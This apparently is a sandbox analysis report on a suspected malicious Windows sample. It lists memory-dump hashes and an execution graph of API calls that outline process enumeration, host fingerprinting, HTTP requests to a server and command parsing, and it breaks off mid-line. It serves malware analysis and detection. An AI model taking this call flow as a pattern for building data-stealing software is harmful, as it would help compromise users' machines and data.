                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e6acc3ed9c6fed6d18a6af745db95960f24466f5ac18e2a8df76a83d31b3e80
                                                                                                                  • Instruction ID: f9cc701259f06fe2deeaa3728dea54dc30ffaf2e4d97d9dd555f2fa48e1a6c73
                                                                                                                  • Opcode Fuzzy Hash: 6e6acc3ed9c6fed6d18a6af745db95960f24466f5ac18e2a8df76a83d31b3e80
                                                                                                                  • Instruction Fuzzy Hash: ABF02872B0FB9A0FDB52936DC8A89643FD0EF2221078A01F6C585CB1B3D919DD41C385
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a7d875f2c62c3939e210bc83e862b1869999fc29de023527c9a6728fb3472173
                                                                                                                  • Instruction ID: c8eee0c8023e75c94375803275e2b30665e654e57f90fb3b689c26ed2afdedd9
                                                                                                                  • Opcode Fuzzy Hash: a7d875f2c62c3939e210bc83e862b1869999fc29de023527c9a6728fb3472173
                                                                                                                  • Instruction Fuzzy Hash: 1CF02B2070EA4A0FCB42EB6D88E89203BE1EF6520074902F6D448CB2B2DD18DC45C3C1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4c16c8f50bd8c5636a9ce8dd3d84f0be08d30d096e61b899dbe2a41037d4d21e
                                                                                                                  • Instruction ID: 765e7dd4699bd5a9510eaaa0d24b8b281707e01a07c7439aaf303f8a4c81aa48
                                                                                                                  • Opcode Fuzzy Hash: 4c16c8f50bd8c5636a9ce8dd3d84f0be08d30d096e61b899dbe2a41037d4d21e
                                                                                                                  • Instruction Fuzzy Hash: 1DF0C220B4EA8A0FCB82E76D88E4A203FE1EF6524178A01F6D448CB2B3D918DC45C791
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b3d8250c7b33cdcb25f13c597c602c59d5a3f9a3e72cad5549b64dd8f5890c55
                                                                                                                  • Instruction ID: 0c3cf2be446737987fb2af20296756751b987fe84cf291f09d6f3d0e43c58173
                                                                                                                  • Opcode Fuzzy Hash: b3d8250c7b33cdcb25f13c597c602c59d5a3f9a3e72cad5549b64dd8f5890c55
                                                                                                                  • Instruction Fuzzy Hash: B0F0F620B0EA8A0FDB42E76C88B49243BE0EF6520174A01F7D849CB1B2D918DC85C3D2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b95a17836f64b0ebbea9cac61146daa0c6ec707462b7b408118fb216d8f7c432
                                                                                                                  • Instruction ID: 5f60c60c9d416247dfacbe323466e91e830d6f85e8c636d848839ef329ad7db8
                                                                                                                  • Opcode Fuzzy Hash: b95a17836f64b0ebbea9cac61146daa0c6ec707462b7b408118fb216d8f7c432
                                                                                                                  • Instruction Fuzzy Hash: CFF0966074EA9A4FDB92D76D88E49203FE1EF6920078A01F6D548CB2B3D918DC85C791
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ed577c5bfe9a26f7266e0aa0d2dadf227830c1585dec7efec1881a81f2da417e
                                                                                                                  • Instruction ID: b326f6ef6e86c575cdb61b115c897822954846e916fe7590565bfc5d7e876c9d
                                                                                                                  • Opcode Fuzzy Hash: ed577c5bfe9a26f7266e0aa0d2dadf227830c1585dec7efec1881a81f2da417e
                                                                                                                  • Instruction Fuzzy Hash: B2F05420756A0A4FDB55EB6C94D9A6037D1FF583017850275D90CCB2B1DA24D885C790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b9508ba6d2d1b9c00782302115d7b39487b43babbaa502e47b0e0df93984fc09
                                                                                                                  • Instruction ID: 6b2a1fccdfbec1cb395c984b6a51a625b5e08805ade61ebb2e8b0b0dc2795f81
                                                                                                                  • Opcode Fuzzy Hash: b9508ba6d2d1b9c00782302115d7b39487b43babbaa502e47b0e0df93984fc09
                                                                                                                  • Instruction Fuzzy Hash: 4AF0F671E0DA8D0FE751D76888A80ECBFE0FF51200F4501F7D498C60B2DD251A558381
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d51fbfb611d9466b2023cb245b07bae436cca3ccd0878e15b8da0e4e84835135
                                                                                                                  • Instruction ID: ee564387425dd6d1fde4d0b0dbc2ab86c00e8715091841eeae9adb64102c788d
                                                                                                                  • Opcode Fuzzy Hash: d51fbfb611d9466b2023cb245b07bae436cca3ccd0878e15b8da0e4e84835135
                                                                                                                  • Instruction Fuzzy Hash: DCF03751F1FB594FD6B5AA6C04751787E91EF45A1074601EED449C72F3D9441D0443C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ab5ab02a2797f9c17b2ea6afd37bea16c7fddf6d379d04e0d691a97f2d7e4531
                                                                                                                  • Instruction ID: 389b3733dfa86e2969fdd65980457738c793a370cf3f486243169f1513552785
                                                                                                                  • Opcode Fuzzy Hash: ab5ab02a2797f9c17b2ea6afd37bea16c7fddf6d379d04e0d691a97f2d7e4531
                                                                                                                  • Instruction Fuzzy Hash: 79F01C34F1961A8FDB29EB54C895AACB7B5FF58300F1142E4D01C972A6CE34BA84CB55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0d45a0f523be18a7d3eb1f73a4e511aa31797e044e48b6527ca044c07b1d5ad6
                                                                                                                  • Instruction ID: ac7700d4ef5b53eccda48774ba7e27e2c886f93bd20c2a66a9e5dbe62ed379b6
                                                                                                                  • Opcode Fuzzy Hash: 0d45a0f523be18a7d3eb1f73a4e511aa31797e044e48b6527ca044c07b1d5ad6
                                                                                                                  • Instruction Fuzzy Hash: D8D0A7A1B55E4E17D654A57404968E9B391EF50700F010574F11B831A6CD14B5044244
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:94.4%
                                                                                                                  Signature Coverage:3.8%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:30
91899 404288 91898->91899 91900 4047e8 3 API calls 91899->91900 91901 40429f 91900->91901 91902 4047e8 3 API calls 91901->91902 91903 4042b6 91902->91903 91904 4047e8 3 API calls 91903->91904 91905 4042cc 91904->91905 91906 4047e8 3 API calls 91905->91906 91907 4042e3 91906->91907 91908 4047e8 3 API calls 91907->91908 91909 4042fa 91908->91909 91910 4047e8 3 API calls 91909->91910 91911 404311 91910->91911 91912 4047e8 3 API calls 91911->91912 91913 404325 91912->91913 91914 4047e8 3 API calls 91913->91914 91915 40433c 91914->91915 91916 4047e8 3 API calls 91915->91916 91917 404353 91916->91917 91918 4047e8 3 API calls 91917->91918 91919 40436a 91918->91919 91920 4047e8 3 API calls 91919->91920 91921 404381 91920->91921 91922 4047e8 3 API calls 91921->91922 91923 404395 91922->91923 91924 4047e8 3 API calls 91923->91924 91925 4043ac 91924->91925 91926 4047e8 3 API calls 91925->91926 91927 4043c3 91926->91927 91928 4047e8 3 API calls 91927->91928 91929 4043da 91928->91929 91930 4047e8 3 API calls 91929->91930 91931 4043f1 91930->91931 91932 4047e8 3 API calls 91931->91932 91933 404408 91932->91933 91934 4047e8 3 API calls 91933->91934 91935 40441c 91934->91935 91936 4047e8 3 API calls 91935->91936 91937 404433 91936->91937 91938 4047e8 3 API calls 91937->91938 91939 40444a 91938->91939 91940 4047e8 3 API calls 91939->91940 91941 40445e 91940->91941 91942 4047e8 3 API calls 91941->91942 91943 404472 91942->91943 91944 4047e8 3 API calls 91943->91944 91945 404486 91944->91945 91946 4047e8 3 API calls 91945->91946 91947 4044a0 91946->91947 91948 4047e8 3 API calls 91947->91948 91949 4044b7 91948->91949 91950 4047e8 3 API calls 91949->91950 91951 4044cd 91950->91951 91952 4047e8 3 API calls 91951->91952 91953 4044e4 91952->91953 91954 4047e8 3 API calls 91953->91954 91955 4044fa 91954->91955 91956 4047e8 3 API calls 91955->91956 91957 404511 91956->91957 91958 4047e8 3 API calls 91957->91958 91959 404528 91958->91959 91960 4047e8 3 API calls 91959->91960 91961 40453e 
91960->91961 91962 4047e8 3 API calls 91961->91962 91963 404558 91962->91963 91964 4047e8 3 API calls 91963->91964 91965 40456f 91964->91965 91966 4047e8 3 API calls 91965->91966 91967 404586 91966->91967 91968 4047e8 3 API calls 91967->91968 91969 40459d 91968->91969 91970 4047e8 3 API calls 91969->91970 91971 4045b4 91970->91971 91972 4047e8 3 API calls 91971->91972 91973 4045cb 91972->91973 91974 4047e8 3 API calls 91973->91974 91975 4045e2 91974->91975 91976 4047e8 3 API calls 91975->91976 91977 4045f9 91976->91977 91978 4047e8 3 API calls 91977->91978 91979 404612 91978->91979 91980 4047e8 3 API calls 91979->91980 91981 404629 91980->91981 91982 4047e8 3 API calls 91981->91982 91983 404642 91982->91983 91984 4047e8 3 API calls 91983->91984 91985 404656 91984->91985 91986 4047e8 3 API calls 91985->91986 91987 40466d 91986->91987 91988 4047e8 3 API calls 91987->91988 91989 404684 91988->91989 91990 4047e8 3 API calls 91989->91990 91991 40469b 91990->91991 91992 4047e8 3 API calls 91991->91992 91993 4046b2 91992->91993 91994 4047e8 3 API calls 91993->91994 91995 4046cc 91994->91995 91996 4047e8 3 API calls 91995->91996 91997 4046e3 91996->91997 91998 4047e8 3 API calls 91997->91998 91999 4046f9 91998->91999 92000 4047e8 3 API calls 91999->92000 92001 404710 92000->92001 92002 4047e8 3 API calls 92001->92002 92003 404727 92002->92003 92004 4047e8 3 API calls 92003->92004 92005 40473d 92004->92005 92006 4047e8 3 API calls 92005->92006 92007 404754 92006->92007 92008 4047e8 3 API calls 92007->92008 92009 404768 92008->92009 92010 4047e8 3 API calls 92009->92010 92011 404781 92010->92011 92012 4047e8 3 API calls 92011->92012 92013 404797 92012->92013 92014 4047e8 3 API calls 92013->92014 92015 4047ae 92014->92015 92016 4047e8 3 API calls 92015->92016 92017 4047c5 92016->92017 92018 4047e8 3 API calls 92017->92018 92019 4047dc 92018->92019 92019->91036 93338 42f109 92020->93338 92022 41258e CreateToolhelp32Snapshot Process32First 92023 4125c2 Process32Next 
92022->92023 92024 4125ef CloseHandle 92022->92024 92023->92024 92026 4125d4 StrCmpCA 92023->92026 93339 42f165 92024->93339 92026->92023 92028 4125e6 92026->92028 92028->92023 92030 4104e7 lstrcpyA 92029->92030 92031 411c67 92030->92031 92032 4104e7 lstrcpyA 92031->92032 92033 411c75 GetSystemTime 92032->92033 92034 411c91 92033->92034 92035 41d016 setSBUpLow 5 API calls 92034->92035 92036 411cc8 92035->92036 92036->91042 92039 4105e1 92037->92039 92038 410605 92038->91058 92039->92038 92040 4105f3 lstrcpyA lstrcatA 92039->92040 92040->92038 92042 410519 lstrcpyA 92041->92042 92043 401d07 92042->92043 92044 410519 lstrcpyA 92043->92044 92045 401d12 92044->92045 92046 410519 lstrcpyA 92045->92046 92047 401d1d 92046->92047 92048 410519 lstrcpyA 92047->92048 92049 401d34 92048->92049 92050 4169b6 92049->92050 92051 410549 2 API calls 92050->92051 92052 4169ec 92051->92052 92053 410549 2 API calls 92052->92053 92054 4169f9 92053->92054 92055 410549 2 API calls 92054->92055 92056 416a06 92055->92056 92057 4104e7 lstrcpyA 92056->92057 92058 416a13 92057->92058 92059 4104e7 lstrcpyA 92058->92059 92060 416a20 92059->92060 92061 4104e7 lstrcpyA 92060->92061 92062 416a2d 92061->92062 92063 4104e7 lstrcpyA 92062->92063 92064 416a3a 92063->92064 92065 4104e7 lstrcpyA 92064->92065 92066 416a47 92065->92066 92067 4104e7 lstrcpyA 92066->92067 92123 416a54 92067->92123 92070 401cfd lstrcpyA 92070->92123 92071 416a98 StrCmpCA 92072 416af1 StrCmpCA 92071->92072 92071->92123 92073 416cd4 92072->92073 92072->92123 92076 41058d lstrcpyA 92073->92076 92077 416cdf 92076->92077 92079 4104e7 lstrcpyA 92077->92079 92080 416cec 92079->92080 92081 41058d lstrcpyA 92080->92081 92116 416c2c 92081->92116 92082 41683e 28 API calls 92082->92123 92083 4168c6 33 API calls 92083->92123 92084 41058d lstrcpyA 92084->92123 92085 4104e7 lstrcpyA 92086 416d0b 92085->92086 92088 41058d lstrcpyA 92086->92088 92087 416b51 StrCmpCA 92089 416baa StrCmpCA 92087->92089 92087->92123 92090 416d15 92088->92090 
92092 416bc0 StrCmpCA 92089->92092 92093 416ca3 92089->92093 93351 416da2 92090->93351 92095 416c72 92092->92095 92096 416bd6 StrCmpCA 92092->92096 92094 41058d lstrcpyA 92093->92094 92102 416cae 92094->92102 92100 41058d lstrcpyA 92095->92100 92097 416be8 StrCmpCA 92096->92097 92098 416c3e 92096->92098 92104 416c0a 92097->92104 92105 416bfa Sleep 92097->92105 92107 41058d lstrcpyA 92098->92107 92099 410519 lstrcpyA 92099->92123 92106 416c7d 92100->92106 92103 4104e7 lstrcpyA 92102->92103 92108 416cbb 92103->92108 92109 41058d lstrcpyA 92104->92109 92105->92123 92110 4104e7 lstrcpyA 92106->92110 92111 416c49 92107->92111 92112 41058d lstrcpyA 92108->92112 92113 416c15 92109->92113 92114 416c8a 92110->92114 92115 4104e7 lstrcpyA 92111->92115 92112->92116 92117 4104e7 lstrcpyA 92113->92117 92118 41058d lstrcpyA 92114->92118 92119 416c56 92115->92119 92116->92085 92121 416c22 92117->92121 92118->92116 92120 41058d lstrcpyA 92119->92120 92120->92116 92122 41058d lstrcpyA 92121->92122 92122->92116 92123->92070 92123->92071 92123->92072 92123->92082 92123->92083 92123->92084 92123->92087 92123->92089 92123->92099 93342 4029f8 92123->93342 93345 402a09 92123->93345 93348 402a1a 92123->93348 93358 402a2b lstrcpyA 92123->93358 93359 402a3c lstrcpyA 92123->93359 93360 402a4d lstrcpyA 92123->93360 92124 416d28 92124->91070 92126 41058d lstrcpyA 92125->92126 92127 418257 92126->92127 92128 41058d lstrcpyA 92127->92128 92129 418262 92128->92129 92130 41058d lstrcpyA 92129->92130 92131 41826d 92130->92131 92131->91074 92133 410529 92132->92133 92134 41053e 92133->92134 92135 410536 lstrcpyA 92133->92135 92134->91085 92135->92134 92137 4109e6 GetVolumeInformationA 92136->92137 92138 4109df 92136->92138 92139 410a4d 92137->92139 92138->92137 92139->92139 92140 410a62 GetProcessHeap HeapAlloc 92139->92140 92141 410a7d 92140->92141 92142 410a8c wsprintfA lstrcatA 92140->92142 92143 4104e7 lstrcpyA 92141->92143 93361 411684 GetCurrentHwProfileA 92142->93361 92145 410a85 92143->92145 
92148 41d016 setSBUpLow 5 API calls 92145->92148 92146 410ac7 lstrlenA 93377 4123d5 lstrcpyA malloc strncpy 92146->93377 92150 410b2e 92148->92150 92149 410aea lstrcatA 92151 410b01 92149->92151 92150->91112 92152 4104e7 lstrcpyA 92151->92152 92153 410b18 92152->92153 92153->92145 92155 410519 lstrcpyA 92154->92155 92156 404b59 92155->92156 93381 404ab6 92156->93381 92158 404b65 92159 4104e7 lstrcpyA 92158->92159 92160 404b81 92159->92160 92161 4104e7 lstrcpyA 92160->92161 92162 404b91 92161->92162 92163 4104e7 lstrcpyA 92162->92163 92164 404ba1 92163->92164 92165 4104e7 lstrcpyA 92164->92165 92166 404bb1 92165->92166 92167 4104e7 lstrcpyA 92166->92167 92168 404bc1 InternetOpenA StrCmpCA 92167->92168 92169 404bf5 92168->92169 92170 405194 InternetCloseHandle 92169->92170 92171 411c4a 7 API calls 92169->92171 92181 4051e1 92170->92181 92172 404c15 92171->92172 92173 4105c7 2 API calls 92172->92173 92174 404c28 92173->92174 92175 41058d lstrcpyA 92174->92175 92176 404c33 92175->92176 92177 410609 3 API calls 92176->92177 92178 404c5f 92177->92178 92179 41058d lstrcpyA 92178->92179 92180 404c6a 92179->92180 92182 410609 3 API calls 92180->92182 92183 41d016 setSBUpLow 5 API calls 92181->92183 92184 404c8b 92182->92184 92185 405235 92183->92185 92186 41058d lstrcpyA 92184->92186 92287 4139c2 StrCmpCA 92185->92287 92187 404c96 92186->92187 92188 4105c7 2 API calls 92187->92188 92189 404cb8 92188->92189 92190 41058d lstrcpyA 92189->92190 92191 404cc3 92190->92191 92192 410609 3 API calls 92191->92192 92193 404ce4 92192->92193 92194 41058d lstrcpyA 92193->92194 92195 404cef 92194->92195 92196 410609 3 API calls 92195->92196 92197 404d10 92196->92197 92198 41058d lstrcpyA 92197->92198 92199 404d1b 92198->92199 92200 410609 3 API calls 92199->92200 92201 404d3d 92200->92201 92202 4105c7 2 API calls 92201->92202 92203 404d48 92202->92203 92204 41058d lstrcpyA 92203->92204 92205 404d53 92204->92205 92206 404d69 InternetConnectA 92205->92206 92206->92170 92207 404d97 
HttpOpenRequestA 92206->92207 92208 404dd7 92207->92208 92209 405188 InternetCloseHandle 92207->92209 92210 404dfb 92208->92210 92211 404ddf InternetSetOptionA 92208->92211 92209->92170 92212 410609 3 API calls 92210->92212 92211->92210 92213 404e11 92212->92213 92214 41058d lstrcpyA 92213->92214 92215 404e1c 92214->92215 92216 4105c7 2 API calls 92215->92216 92217 404e3e 92216->92217 92218 41058d lstrcpyA 92217->92218 92219 404e49 92218->92219 92220 410609 3 API calls 92219->92220 92221 404e6a 92220->92221 92222 41058d lstrcpyA 92221->92222 92223 404e75 92222->92223 92224 410609 3 API calls 92223->92224 92225 404e97 92224->92225 92226 41058d lstrcpyA 92225->92226 92227 404ea2 92226->92227 92228 410609 3 API calls 92227->92228 92229 404ec3 92228->92229 92230 41058d lstrcpyA 92229->92230 92231 404ece 92230->92231 92232 410609 3 API calls 92231->92232 92233 404eef 92232->92233 92234 41058d lstrcpyA 92233->92234 92235 404efa 92234->92235 92236 4105c7 2 API calls 92235->92236 92237 404f19 92236->92237 92238 41058d lstrcpyA 92237->92238 92239 404f24 92238->92239 92240 410609 3 API calls 92239->92240 92241 404f45 92240->92241 92242 41058d lstrcpyA 92241->92242 92243 404f50 92242->92243 92244 410609 3 API calls 92243->92244 92245 404f71 92244->92245 92246 41058d lstrcpyA 92245->92246 92247 404f7c 92246->92247 92248 4105c7 2 API calls 92247->92248 92249 404f9e 92248->92249 92250 41058d lstrcpyA 92249->92250 92251 404fa9 92250->92251 92252 410609 3 API calls 92251->92252 92253 404fca 92252->92253 92254 41058d lstrcpyA 92253->92254 92255 404fd5 92254->92255 92256 410609 3 API calls 92255->92256 92257 404ff7 92256->92257 92258 41058d lstrcpyA 92257->92258 92259 405002 92258->92259 92260 410609 3 API calls 92259->92260 92261 405023 92260->92261 92262 41058d lstrcpyA 92261->92262 92263 40502e 92262->92263 92264 410609 3 API calls 92263->92264 92265 40504f 92264->92265 92266 41058d lstrcpyA 92265->92266 92267 40505a 92266->92267 92268 4105c7 2 API calls 92267->92268 92269 405079 
92268->92269 92270 41058d lstrcpyA 92269->92270 92271 405084 92270->92271 92272 4104e7 lstrcpyA 92271->92272 92273 40509f 92272->92273 92274 4105c7 2 API calls 92273->92274 92275 4050b6 92274->92275 92276 4105c7 2 API calls 92275->92276 92277 4050c7 92276->92277 92278 41058d lstrcpyA 92277->92278 92279 4050d2 92278->92279 92280 4050e8 lstrlenA lstrlenA HttpSendRequestA 92279->92280 92281 40515c InternetReadFile 92280->92281 92282 405176 InternetCloseHandle 92281->92282 92285 40511c 92281->92285 92283 402920 92282->92283 92283->92209 92284 410609 3 API calls 92284->92285 92285->92281 92285->92282 92285->92284 92286 41058d lstrcpyA 92285->92286 92286->92285 92288 4139e1 ExitProcess 92287->92288 92289 4139e8 strtok_s 92287->92289 92290 413b48 92289->92290 92303 413a04 92289->92303 92290->91121 92291 413b2a strtok_s 92291->92290 92291->92303 92292 413a21 StrCmpCA 92292->92291 92292->92303 92293 413a75 StrCmpCA 92293->92291 92293->92303 92294 413ab4 StrCmpCA 92294->92291 92294->92303 92295 413af4 StrCmpCA 92295->92291 92296 413b16 StrCmpCA 92296->92291 92297 413a59 StrCmpCA 92297->92291 92297->92303 92298 413ac9 StrCmpCA 92298->92291 92298->92303 92299 413a3d StrCmpCA 92299->92291 92299->92303 92300 413a9f StrCmpCA 92300->92291 92300->92303 92301 413ade StrCmpCA 92301->92291 92302 410549 2 API calls 92302->92303 92303->92291 92303->92292 92303->92293 92303->92294 92303->92295 92303->92296 92303->92297 92303->92298 92303->92299 92303->92300 92303->92301 92303->92302 92305 410519 lstrcpyA 92304->92305 92306 405f64 92305->92306 92307 404ab6 5 API calls 92306->92307 92308 405f70 92307->92308 92309 4104e7 lstrcpyA 92308->92309 92310 405f8c 92309->92310 92311 4104e7 lstrcpyA 92310->92311 92312 405f9c 92311->92312 92313 4104e7 lstrcpyA 92312->92313 92314 405fac 92313->92314 92315 4104e7 lstrcpyA 92314->92315 92316 405fbc 92315->92316 92317 4104e7 lstrcpyA 92316->92317 92318 405fcc InternetOpenA StrCmpCA 92317->92318 92319 406000 92318->92319 92320 4066ff InternetCloseHandle 
92319->92320 92321 411c4a 7 API calls 92319->92321 93387 408048 CryptStringToBinaryA 92320->93387 92324 406020 92321->92324 92325 4105c7 2 API calls 92324->92325 92327 406033 92325->92327 92326 410549 2 API calls 92329 406739 92326->92329 92328 41058d lstrcpyA 92327->92328 92333 40603e 92328->92333 92330 410609 3 API calls 92329->92330 92331 406750 92330->92331 92332 41058d lstrcpyA 92331->92332 92338 40675b 92332->92338 92334 410609 3 API calls 92333->92334 92335 40606a 92334->92335 92336 41058d lstrcpyA 92335->92336 92337 406075 92336->92337 92341 410609 3 API calls 92337->92341 92339 41d016 setSBUpLow 5 API calls 92338->92339 92340 4067eb 92339->92340 92471 41343f strtok_s 92340->92471 92342 406096 92341->92342 92343 41058d lstrcpyA 92342->92343 92344 4060a1 92343->92344 92345 4105c7 2 API calls 92344->92345 92346 4060c3 92345->92346 92347 41058d lstrcpyA 92346->92347 92348 4060ce 92347->92348 92349 410609 3 API calls 92348->92349 92350 4060ef 92349->92350 92351 41058d lstrcpyA 92350->92351 92352 4060fa 92351->92352 92353 410609 3 API calls 92352->92353 92354 40611b 92353->92354 92355 41058d lstrcpyA 92354->92355 92356 406126 92355->92356 92357 410609 3 API calls 92356->92357 92358 406148 92357->92358 92359 4105c7 2 API calls 92358->92359 92360 406153 92359->92360 92361 41058d lstrcpyA 92360->92361 92362 40615e 92361->92362 92363 406174 InternetConnectA 92362->92363 92363->92320 92364 4061a2 HttpOpenRequestA 92363->92364 92365 4061e2 92364->92365 92366 4066f3 InternetCloseHandle 92364->92366 92367 406206 92365->92367 92368 4061ea InternetSetOptionA 92365->92368 92366->92320 92369 410609 3 API calls 92367->92369 92368->92367 92370 40621c 92369->92370 92371 41058d lstrcpyA 92370->92371 92372 406227 92371->92372 92373 4105c7 2 API calls 92372->92373 92374 406249 92373->92374 92375 41058d lstrcpyA 92374->92375 92376 406254 92375->92376 92377 410609 3 API calls 92376->92377 92378 406275 92377->92378 92379 41058d lstrcpyA 92378->92379 92380 406280 92379->92380 92381 
410609 3 API calls 92380->92381 92382 4062a2 92381->92382 92383 41058d lstrcpyA 92382->92383 92384 4062ad 92383->92384 92385 410609 3 API calls 92384->92385 92386 4062cf 92385->92386 92387 41058d lstrcpyA 92386->92387 92388 4062da 92387->92388 92389 410609 3 API calls 92388->92389 92390 4062fb 92389->92390 92391 41058d lstrcpyA 92390->92391 92392 406306 92391->92392 92393 4105c7 2 API calls 92392->92393 92394 406325 92393->92394 92395 41058d lstrcpyA 92394->92395 92396 406330 92395->92396 92397 410609 3 API calls 92396->92397 92398 406351 92397->92398 92399 41058d lstrcpyA 92398->92399 92400 40635c 92399->92400 92401 410609 3 API calls 92400->92401 92402 40637d 92401->92402 92403 41058d lstrcpyA 92402->92403 92404 406388 92403->92404 92405 4105c7 2 API calls 92404->92405 92406 4063aa 92405->92406 92407 41058d lstrcpyA 92406->92407 92408 4063b5 92407->92408 92409 410609 3 API calls 92408->92409 92410 4063d6 92409->92410 92411 41058d lstrcpyA 92410->92411 92412 4063e1 92411->92412 92413 410609 3 API calls 92412->92413 92414 406403 92413->92414 92415 41058d lstrcpyA 92414->92415 92416 40640e 92415->92416 92417 410609 3 API calls 92416->92417 92418 40642f 92417->92418 92419 41058d lstrcpyA 92418->92419 92420 40643a 92419->92420 92421 410609 3 API calls 92420->92421 92422 40645b 92421->92422 92423 41058d lstrcpyA 92422->92423 92424 406466 92423->92424 92425 410609 3 API calls 92424->92425 92426 406487 92425->92426 92427 41058d lstrcpyA 92426->92427 92428 406492 92427->92428 92429 410609 3 API calls 92428->92429 92430 4064b3 92429->92430 92431 41058d lstrcpyA 92430->92431 92432 4064be 92431->92432 92433 410609 3 API calls 92432->92433 92434 4064df 92433->92434 92435 41058d lstrcpyA 92434->92435 92436 4064ea 92435->92436 92437 4105c7 2 API calls 92436->92437 92438 406506 92437->92438 92439 41058d lstrcpyA 92438->92439 92440 406511 92439->92440 92441 410609 3 API calls 92440->92441 92442 406532 92441->92442 92443 41058d lstrcpyA 92442->92443 92444 40653d 92443->92444 92445 
